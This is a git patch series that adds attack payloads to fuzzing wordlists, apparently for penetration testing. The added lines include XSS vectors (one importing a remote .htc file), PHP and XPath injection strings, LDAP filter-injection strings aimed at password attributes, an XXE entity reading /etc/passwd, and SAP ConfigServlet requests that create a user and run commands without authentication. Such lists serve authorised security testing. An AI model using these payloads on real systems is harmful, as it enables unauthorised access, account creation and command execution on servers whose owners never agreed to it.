From 3570ebcd2fbcb5545da8799dbc8b60390dc06831 Mon Sep 17 00:00:00 2001
From: Jay Turla <shipcodez@gmail.com>
Date: Wed, 19 Nov 2014 15:21:10 +0800
Subject: [PATCH 1/4] Update XML_FUZZ

Adding some payloads
---
 Fuzzing/XML_FUZZ | 7 +++++++
 1 file changed, 7 insertions(+)

diff --git a/Fuzzing/XML_FUZZ b/Fuzzing/XML_FUZZ
index c2223ac..1aaf47f 100644
--- a/Fuzzing/XML_FUZZ
+++ b/Fuzzing/XML_FUZZ
@@ -11,6 +11,11 @@
 ]>
 <!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///etc/passwd">
 ]>
+"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
+"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+"<xml SRC=""xsstest.xml"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
+<name>','')); phpinfo(); exit;/*</name>
 
 
 ## Element and Attrib Values
@@ -48,3 +53,5 @@ false
 {{Tnn96}}
 {= Tnn96}
 {{= Tnn96}}
+count(/child::node())
+x' or name()='username' or 'x'='y

From 39802ff82f5d4a8d2124e3fbf0892cb238a30da1 Mon Sep 17 00:00:00 2001
From: Jay Turla <shipcodez@gmail.com>
Date: Wed, 19 Nov 2014 15:27:31 +0800
Subject: [PATCH 2/4] Update XML_FUZZ

---
 Fuzzing/XML_FUZZ | 8 ++++++++
 1 file changed, 8 insertions(+)

diff --git a/Fuzzing/XML_FUZZ b/Fuzzing/XML_FUZZ
index 1aaf47f..411cf60 100644
--- a/Fuzzing/XML_FUZZ
+++ b/Fuzzing/XML_FUZZ
@@ -53,5 +53,13 @@ false
 {{Tnn96}}
 {= Tnn96}
 {{= Tnn96}}
+' or '1'='1
+' or ''='
+x' or 1=1 or 'x'='y
+/
+//
+//*
+*/*
+@*
 count(/child::node())
 x' or name()='username' or 'x'='y

From 726901c9310eac410c19674c02f14ee24e73ceeb Mon Sep 17 00:00:00 2001
From: Jay Turla <shipcodez@gmail.com>
Date: Wed, 19 Nov 2014 15:31:08 +0800
Subject: [PATCH 3/4] Create LDAP_FUZZ.txt

---
 Fuzzing/LDAP_FUZZ.txt | 26 ++++++++++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 Fuzzing/LDAP_FUZZ.txt

diff --git a/Fuzzing/LDAP_FUZZ.txt b/Fuzzing/LDAP_FUZZ.txt
new file mode 100644
index 0000000..d84ea8c
--- /dev/null
+++ b/Fuzzing/LDAP_FUZZ.txt
@@ -0,0 +1,26 @@
+!
+%21
+%26
+%28
+%29
+%2A%28%7C%28mail%3D%2A%29%29
+%2A%28%7C%28objectclass%3D%2A%29%29
+%2A%7C
+%7C
+&
+(
+)
+*(|(mail=*))
+*(|(objectclass=*))
+*/*
+*|
+/
+//
+//*
+@*
+x' or name()='username' or 'x'='y
+|
+*()|&'
+admin*
+admin*)((|userpassword=*)
+*)(uid=*))(|(uid=*

From d1bdc1d65a2b7580b140ceb0780fc61da8d6d293 Mon Sep 17 00:00:00 2001
From: JT <shipcodez@gmail.com>
Date: Sun, 14 Dec 2014 18:37:07 +0800
Subject: [PATCH 4/4] Update sap.txt

adding SAP ConfigServlet Remote Unauthenticated Payload Execution
---
 vulns/sap.txt | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/vulns/sap.txt b/vulns/sap.txt
index b46b186..1d14630 100755
--- a/vulns/sap.txt
+++ b/vulns/sap.txt
@@ -92,6 +92,8 @@ caf
 ccsui
 com~tc~lm~webadmin~httpprovider~web
 ctc
+ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=blabla,PASSWORD=blabla
+ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig%20/all
 dispatcher
 dswsbobje
 dtr_lite